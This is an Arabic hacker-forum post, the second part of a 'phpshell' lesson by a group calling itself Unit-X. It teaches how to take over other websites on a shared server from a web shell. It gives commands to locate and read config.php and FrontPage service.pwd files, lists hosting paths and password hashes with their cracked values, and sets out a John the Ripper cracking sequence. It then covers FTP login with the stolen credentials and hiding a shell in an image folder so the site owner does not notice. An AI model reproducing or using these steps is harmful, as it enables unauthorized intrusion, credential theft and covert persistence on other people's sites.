Admin
عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
 المزاج : Don't Play With Me
 |  موضوع: phpshll ... ..2.  الأربعاء أغسطس 24, 2011 10:08 pm | |
|
تابع الدرس الاول
نبداء بالسهل الاول
وهو البحث عن كلمات السر لقواعدالبيانات
لو عاوز تخترق قواعد البيانات وكلمات السر الغير مشفرة اكتب
find / -name config.php
هيجيلك كل البرامج الى فيها الكونفيج على السرفر بهذا الشكل
--------------------------------------------------------------------------------
usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php
usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config.php
usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB2/config.php
usr/local/plesk/apache/vhosts/ukraine-today.com/httpdocs/config.php
usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/mylinks/cache/config.php
usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/bb/config.php
usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/s/cache/config.php
usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/system/cache/config.php
usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php
usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
--------------------------------------------------------------------------------
وعلشان تعرف تشوف الى داخل الملف تكتب
cat /usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php
راح يظهرلك مثلا صفحة الكونفيج
وفيها كلمة المرور واليوزر نيم واسم قاعدة البينات
الى بتخص البرنامج phpBB2 الى كلنا عرفينه (منتدى) الى امتداده على الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وتقدر تشبك مع قاعدة البيانات من خلال البرنامج ده
MySQL-Front
طيب احنا الحين خلصنا من كلمات السر الغير مشفرة ندخل بقى على الجد
وذى ما قلت فى الاعلى كل الشركات بتحاول تقدم افضل دعم للمستخدم ومن هذه الدواعم
الفرونت بيج وده الى راح يفتح لنا البوابة الكبيرة للسرفر
انتو طبعا عرفين ان الملف الى بيكون فيه كلمة السر فى الفرونت بيج
vti_pvt/service.pwd
انا مش هقولك مكان الملف على السرفر لاكنك عارف بالطبع مكانه على الموقع ليش انا مابريد اقول مكانه على السرفر
لان كل سرفر له تقسيمة خاصة لنظم الملفات المهم ايه الحل البديل الحل هو انك تكتب امر البحث عن الملف
find / -name service.pwd
احنا فى الامر الى فات قولنا ابحث فى (/) يعنى فى الجزر الرئيسى عن الملف service.pwd وهتكون النتيجة مثلا
--------------------------------------------------------------------------------
usr/local/plesk/apache/vhosts/nextstagetheater.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/motherlobe.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/urbanspacesny.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/mysticalgammon.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/qfx.us/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/intranet.rpec.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/rayonierpamill.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd
--------------------------------------------------------------------------------
طبعا ده عدد قليل جدا من المواقع انت هيظهرلك على الاقل 100 موقع حسب عدد المواقع الى على السرفر
طيب احنا استفدنا ايه من النواتج للبحث ؟
استفدنا كثير فمثلا انا عرفت ان كلمة السر الخاصة بموقع pamillsite.com
موجودة على الامتداد ده
usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd
اى انى لو كتبت
cat /usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd
راح يعرض لى كلمت السر الخاصة بالموقع شفت ان الموضوع سهل جد وما محتاج اى تعب
ناتى لفك التشفير
لا تفك تشفير موقع وتنتظر الناتج ده مش عملى على الاطلاق انت تجمع كل كلمات السر الى على السرفر
وتضعها فى ملف واحد باسم
passwd.txt
وهيكون مثلا شكله
---------------------
jthomas9wJhyXfDlEIk
ifabc:uyFtvzEic6WbU
joram:dx8064QfE1HfA
akron:HxcPUY85ni/j2
hpoe:9B1k8oG5Jp/Uo
amwab:6vCYtKGUyLO3s
antsi:A2FDHZxUzq2XM
hsheini:NI7HeAEGXR1BM
nskribne:PDBdOXeHxL6lc
besta:8apscPCSCmLV.
bibic:k8G2BP0kMWdb2
bobpr:6UgBiD.w6ybRU
---------------------
حيث p9wJhyXfDlEIk
كلمة السر المشفرة
jthomas اليوزر نيم
والبرنامج كدا راح يكون اسرع وهتحصل على نتائج فى اقل من خمس ثوانى
واعتقد ان الاخ joun هيفدكم اتكككم معاه
اهلا بيكم اخوانى
انا راح اعطيكم مجموعة من الاوامر تمش عليها بالترتيب وراح تفك اكثر من 60 فى المائة فى اقل من دقيقة
نبداء على بركة الله
--------------------------
john -single passwd.txt
john -savemem:3 passwd.txt
john -digits passwd.txt
john -i:alpha passwd.txt
john -i:all passwd.txt
-------------------------
اخوانى اهم شىء الترتيب من الاعلى
بعد اما فكيت كلمة السر الى بتلاقيها فى الملف john.pot
هتفتحه على النوت باد هيظهرلك الاتى
----------------------
GKFr8t.h31s/6:cipell
39JkE7aN1.W7w:ideia
w5ArwaUy1rfIM:juntolli
toh9pFhI1.MsQradotel
cXbFL4K4ZcIXE:balada29
SZqqtC/L8lHOM:123456
8fgJCj3Jab0bE:123456
SCcoLYxDqIGzc:hendrix
tTkN3kEGY2kCc:metal
---------------------
طبعا ذى انتو ما شيفين السطر نصفين كلمة السر المشفرة
وكلمة السر بعد الكسر
المشفرة:GKFr8t.h31s/6
المكسورة:cipell
طيب ترجع لملف كلمات السر وتبحث عن كلمة السر المشفرة الى انت فكيتها هذه
GKFr8t.h31s/6
وتشوف ايه اليوزر نيم الخاص بيها
اترككم تكملو مع الاخ Evil-Mster
اهلا اخوانى
تدخل على ftp الخاص بالموقع وتكتب اليوزر نيم وكلمة السر
هتقولى فى مواقع لما بكتب اف تى بى واسم الموقع ما بيفتح
وفى مواقع بدخلنى على الخدمة من غير كلمة سر ولا يوز نيم
انا اقوله اكيد وده مش مشكلة ممكن نحلها
اكتب
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
حيث cipell اليوزر نيم
وهو راح يسالك عن كلمة المرور وبكدا تدخل على الموقع وتعمل الى انت عاوزه
هتلاقى ملفات الموقع فى احد الامتدادات الاتية
------------
www
او
public_html
او
httpdocs
------------
لاكنى انصحكم بان تضع الشيل على الموقع وما تغير شىء فيه ويكون فى مكان مش ظاهر
يعنى فولدر للصور او اى شىء من هذا حتى ما يلاحظ صاحب الموقع ويغلقه
وما تستفاد انت اى شىء
انا كنت تكلمت عن هدية بالاعلى وهى انى سوف اعطيكم مجموعة من كلمات السر المشفرة تجربو فيها
نصائح الاخ joun والى هيجبلى كلمة سر مفكوكة ليه شيل هدية
شوفتم السخاء انا ديما اخوكم وفى الخدمة
بس ما تنسوى ارفاق الايميل الخاص بيكم بكلمة السر المفكوكة
واسف على اى تقصير من ناحيتى ومن المجموعة
-------------
الدروس القادمة:
-------------
انتظر استخدام صغرات السى والبيرل على الشيل
والحصول على Root
واختراق سرفرات الساف مود
فى دروس اخوكم Evil-Master
وسف اعلن قريبا عن دروس الاخ Digital-X
فى السيطرة على قواعد البيانات بجميع انواعها وتحقيق اكبر قدر من الاستفادة
والى ضعيف فى الصغرات بيكون معاه الاخ Q8_Risk
بيساعده فى التعلم انشاء الله
وما بنسى اقول انى تعبت فى الموضوع ده علشان كدا الى بيريد ينفله
ياريت يكتب اسمى او اسم المجموعة
--------
Unit-X
--------
منتظر اختراقاتكم
والسلام خير ختام
PASSWD
منقول للفائده
| |
|
